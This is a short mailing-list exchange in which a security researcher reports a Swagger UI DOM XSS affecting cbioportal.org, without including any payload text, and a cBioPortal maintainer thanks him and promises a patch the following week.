Swagger-UI XSS - cbioportal.org


דוד בוזגלו

Aug 25, 2022, 8:16:45 AM
to cbiop...@googlegroups.com
Hello,

My name is David and I am a security researcher. 

In our search we found the following Swagger XSS.

Swagger UI is a really common library used to display API specifications in a nice-looking UI used by almost every company. I stumbled upon it many times when doing recon on bug bounty targets and decided to take a closer look at it in Nov 2020. On Twitch, I streamed the process of reviewing and finding bugs in the library, but I found the final payload off camera after the stream. The bug that I found was a DOM XSS, and it turned out that there were a lot of vulnerable instances.

[attached image: image.png]


Liked my bug? Buy me a coffee (or more likely a beer x2).

Help me to continue to protect others' information.

Luke Sikina

Aug 25, 2022, 11:57:41 AM
to cBioPortal for Cancer Genomics Discussion Group
Hi David,

Thanks for the repro! We have a patch for this that will go live next week.
